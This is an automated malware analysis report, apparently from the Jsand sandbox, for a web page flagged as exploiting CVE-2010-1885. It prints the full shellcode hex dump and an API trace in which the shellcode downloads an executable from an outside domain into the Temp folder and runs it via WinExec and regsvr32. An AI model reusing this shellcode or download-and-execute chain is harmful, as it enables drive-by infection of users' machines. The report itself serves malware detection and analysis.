Analysis report for http://www.acmister.com/web.html

Sample Overview

URL http://www.acmister.com/web.html
Domainwww.acmister.com
Analysis Started 2012-07-20 13:56:49
Report Generated 2012-07-20 13:57:12
Jsand version 2.3.3

See the report for domain www.acmister.com.

Detection results

DetectorResult
Jsand 2.3.3 malicious

In particular, the following URL was found to contain malicious content:

Exploits

NameDescriptionReference
HPC URLHelp Center URL Validation VulnerabilityCVE-2010-1885

Deobfuscation results

Evals

Writes

Network Activity

Requests

URL StatusContent Type
http://www.acmister.com/web.html 200text/html

Redirects

No redirects.

ActiveX controls

Shellcode

HexadecimalASCII
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81 
e9 50 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff 
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3 
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04 
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3 
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3 
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4 
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b 
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3 
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3 
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b 
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7 
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28 
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d 
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab 
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c 
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c 
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40 
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28 
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21 
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28 
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e 
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3 
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42 
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2 
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07 
58 40 5c 5c 58 12 07 07  5c 5a 49 44 49 44 49 44 
49 44 49 19 1a 1b 06 4b  47 06 4b 4b 07 5f 06 58 
40 58 17 4e 15 4b 1d 10  1a 1e 0e 4d 15 19 28 28 
AAAAf......X1.f.
.P..0(@.........
..]..w..L.h..h$.
X4~.^...N.v.+\..
..=8....h..n..].
.....]y..dy~.]..
\.P+.~.^.+...ai.
.+...'.8..\...%+
.h...7].v.v.+.N.
$c.n..|.$..+..,.
+..vq..{..@..U$.
\+....@...B-q...
.....((((pxBh@.(
((x..1x}...v8..-
..@GF((@]ZDE|.>.
.....I....*.Z..,
)((.t.$.,.ZMO[.l
.,^Z...l....[.{@
.(((.~$....y.l5(
_XJ\.l5-.LDD.l5!
(q..,..l5,iyB(B(
{.B(.~<..]>B({.~
,B(..${.~,..$.*.
;o..(].o..(].B(B
..~.......f&....
&.G)....s3.nQ.2.
X@\\X...\ZIDIDID
IDI....KG.KK._.X
@X.N.K.....M..((

This shellcode was found on http://tralalalala123.co.cc/main.php?page=4f7377f400e2e2b1.

Shellcode Analysis

Shellcode API Trace

OffsetDLL.API Name and argumentsReturn value
0x7c801ad9kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)1
0x7c801d7bkernel32.LoadLibraryA(lpFileName=urlmon)0x1a400000
0x7c835dfakernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbeurlmon.URLDownloadToFileA(pCaller=0, szURL=http://tralalalala123.co.cc/w.php?f=c5826&e=1, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)0
0x7c86250dkernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250dkernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3bkernel32.TerminateThread(dwExitCode=0)

Shellcode DLLs

DLL Name
kernel32.dll
urlmon.dll

Shellcode URLs

Complete URLDomain NameIP Address
http://tralalalala123.co.cc/w.php?f=c5826&e=1tralalalala123.co.cc

Malware

Additional (potential) malware:

URLTypeHashAnalysis
http://tralalalala123.co.cc/w.php?f=c5826&e=1 PE32 executable for MS Windows (GUI) Intel 80386 32-bit 59a70b5b48aaf10194955b2ef92083ec
FEEDBACK

Comments